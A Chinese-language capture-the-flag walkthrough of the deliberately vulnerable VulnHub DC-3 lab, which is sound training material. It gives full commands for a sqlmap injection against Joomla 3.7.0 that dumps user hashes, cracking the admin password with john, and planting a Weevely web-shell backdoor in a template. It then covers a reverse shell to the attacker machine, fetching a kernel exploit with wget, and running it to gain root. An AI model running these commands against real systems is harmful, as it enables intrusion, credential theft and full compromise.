DC-3靶机攻略
靶机地址
https://www.vulnhub.com/entry/dc-3,312/
DC-3-2.zip (Size: 1005 MB)
Download: http://www.five86.com/downloads/DC-3-2.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-3-2.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-3-2.zip.torrent ( Magnet)
靶机描述
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).
If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
信息收集
攻击机地址:192.168.0.107
靶机地址:192.168.0.106
Nmap进行全端口探测nmap -A -p- 192.168.0.106,发现开放80端口,打开发现是个Joomla的站点
先进行一下目录探测,看下开放了什么目录,除了后台没有什么有用的信息
用joomscan进行一下扫描joomscan --url http://192.168.0.106,发现当前版本为3.7.0
看下这个版本的joomala存在SQL注入漏洞searchsploit joomla 3.7
漏洞利用及提权
查看漏洞详情 https://www.exploit-db.com/exploits/42033
用sqlmap直接开始跑
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --dbs
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T "#__users" --columns --dump
获取了admin的账户密码,接下来就是爆破这个hash值了
写入hash值到hash1.txt echo "\$2y\$10\$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu" > hash1.txt
使用john进行爆破获取密码为snoopy john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt ./hash1.txt
使用获取的用户名密码admin/snoopy登录后台 http://192.168.0.106/administrator/ 找个模板编辑更改文件来反弹shell
这里我是用Weevely生成后门 weevely generate test test.php (具体使用参考https://blog.csdn.net/qq_45521281/article/details/106587791)
在bezz3模板文件的index.php中插入代码,保存后预览获取地址 http://192.168.0.106/index.php?tp=1&templateStyle=4
使用weevely进行连接weevely "http://192.168.0.106/index.php?tp=1&templateStyle=4" test,当前是个www-data权限
接着我们弹个shell回来,在攻击机上用nc开启监听nc -lvp 7777,在weevely中使用backdoor_reversetcp 192.168.0.107 7777后回弹shell,切换成交互式shellpython -c 'import pty; pty.spawn("/bin/bash")'
查看当前系统版本,searchsploit -w Ubuntu 16.04 看下当前版本有没有提权漏洞
其实还是有蛮多提权漏洞的,但靶机是32位系统,选择符合条件的漏洞,我们用这个试试 https://www.exploit-db.com/exploits/39772
根据说明下载39772.zip,但直接下载会拒绝连接,需要配置hosts文件(添加151.101.76.133 raw.githubusercontent.com)
在本地下载完成后开启HTTP服务python -m SimpleHTTPServer 8090,靶机切换至tmp目录后传至靶机上wget "http://192.168.0.107:8090/39772.zip"
接着解压文件
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
在/root目录下发现the-flag.txt
